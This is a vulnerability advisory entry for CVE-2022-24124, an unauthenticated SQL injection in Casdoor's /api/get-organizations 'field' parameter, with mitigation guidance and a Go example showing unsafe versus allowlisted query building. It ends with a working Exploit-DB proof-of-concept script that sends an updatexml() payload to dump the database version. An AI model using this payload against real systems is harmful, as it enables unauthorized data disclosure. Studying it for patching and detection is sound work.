Vendor: Casdoor
By: Mayank Deshmukh
CVSS: 7.5 (HIGH)
CWE: 89 (SQL Injection)
Product Name: Casdoor
Affected Version From: < 1.13.1
Affected Version To: 1.13.0
Patch Exists: YES
Related CWE: CVE-2022-24124
CPE: a:casdoor:casdoor:1.13.0
Metasploit:
Other Scripts:
Tags: sqli,unauth,packetstorm,edb,cve,cve2022,casdoor
CVSS Metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
Nuclei Metadata: {'max-request': 1, 'product': 'casdoor', 'shodan-query': 'http.title:"Casdoor"', 'vendor': 'casbin'}
Platforms Tested: Kali Linux
2022

Casdoor 1.13.0 – SQL Injection (Unauthenticated)

Casdoor versions before 1.13.1 are vulnerable to unauthenticated SQL injection due to improper input validation: the "field" parameter of the /api/get-organizations endpoint is used in a database query without being checked. A remote attacker can exploit this by sending a specially crafted HTTP request to the application, causing arbitrary SQL to execute on the underlying database and potentially disclosing sensitive information.

Mitigation:

Upgrade to version 1.13.1 or later.
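The root cause above is a client-chosen column name spliced into SQL text. The following is an added example, not Casdoor's own code, that shows that pattern next to a hardened builder (allowlisted identifier plus a bind parameter) and a small check a defender can run over decoded "field" values from access logs; the table and column names are assumed.

```go
package main

import (
	"fmt"
	"regexp"
)

// allowedFields is an allowlist of column names a client may filter on
// (constructed names; not Casdoor's schema).
var allowedFields = map[string]bool{"name": true, "display_name": true, "created_time": true}

// buildFilterUnsafe shows the vulnerable pattern: the client-supplied column name is
// spliced into the SQL text, so a value such as updatexml(null,version(),null) is
// executed by the database instead of being treated as an identifier.
func buildFilterUnsafe(field, value string) string {
	return fmt.Sprintf("SELECT * FROM organization WHERE %s LIKE '%%%s%%'", field, value)
}

// buildFilterSafe rejects any column name not on the allowlist and passes the search
// value as a bind parameter, so neither input can change the query's structure.
func buildFilterSafe(field, value string) (string, []interface{}, error) {
	if !allowedFields[field] {
		return "", nil, fmt.Errorf("filter field %q is not allowed", field)
	}
	return "SELECT * FROM organization WHERE " + field + " LIKE ?", []interface{}{"%" + value + "%"}, nil
}

// identOnly matches what a legitimate column name looks like (optionally qualified,
// e.g. organization.name); anything else in a logged field parameter is worth alerting on.
var identOnly = regexp.MustCompile(`^[A-Za-z_][A-Za-z0-9_.]*$`)

// suspiciousField returns true when a URL-decoded field parameter is not a plain identifier.
func suspiciousField(field string) bool {
	return !identOnly.MatchString(field)
}

func main() {
	injected := "updatexml(null,version(),null)" // the payload from the advisory's PoC
	fmt.Println("unsafe query :", buildFilterUnsafe(injected, "cfx"))
	_, _, err := buildFilterSafe(injected, "cfx")
	fmt.Println("hardened     :", err)
	fmt.Println("log check    :", suspiciousField(injected), suspiciousField("name"))
}
```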

Exploit-DB raw data:

// Exploit Title: Casdoor 1.13.0 - SQL Injection (Unauthenticated) 
// Date: 2022-02-25
// Exploit Author: Mayank Deshmukh
// Vendor Homepage: https://casdoor.org/
// Software Link: https://github.com/casdoor/casdoor/releases/tag/v1.13.0
// Version: version < 1.13.1
// Security Advisory: https://github.com/advisories/GHSA-m358-g4rp-533r
// Tested on: Kali Linux
// CVE : CVE-2022-24124
// Github POC: https://github.com/ColdFusionX/CVE-2022-24124

// Exploit Usage : go run exploit.go -u http://127.0.0.1:8080

package main

import (
	"flag"
	"fmt"
	"html"
	"io"
	"net/http"
	"os"
	"regexp"
	"strings"
)

func main() {
	var url string
	flag.StringVar(&url, "u", "", "Casdoor URL (ex. http://127.0.0.1:8080)")
	flag.Parse()

	if url == "" {
		flag.Usage()
		os.Exit(1)
	}

	banner := `
-=Casdoor SQL Injection (CVE-2022-24124)=-
- by Mayank Deshmukh (ColdFusionX)

`
	// Print, not Printf: the banner is plain text, not a format string.
	fmt.Print(banner)
	fmt.Println("[*] Dumping Database Version")

	// The field parameter is used in the SQL query unvalidated; the updatexml()
	// call makes the server return version() inside an XPath error message.
	response, err := http.Get(url + "/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(null,version(),null)")
	if err != nil {
		panic(err)
	}
	defer response.Body.Close()

	databytes, err := io.ReadAll(response.Body)
	if err != nil {
		panic(err)
	}
	content := string(databytes)

	// The error text comes back HTML-escaped, so the closing quote appears as &#39.
	re := regexp.MustCompile("(?i)(XPATH syntax error.*&#39)")
	result := re.FindAllString(content, -1)

	if result == nil {
		fmt.Printf("Application not vulnerable\n")
		os.Exit(1)
	}

	// Strip the slice brackets and the escaped quote before printing the match.
	sqliop := fmt.Sprint(result)
	replacer := strings.NewReplacer("[", "", "]", "", "&#39", "", ";", "")
	finalop := replacer.Replace(sqliop)
	fmt.Println(html.UnescapeString(finalop))
}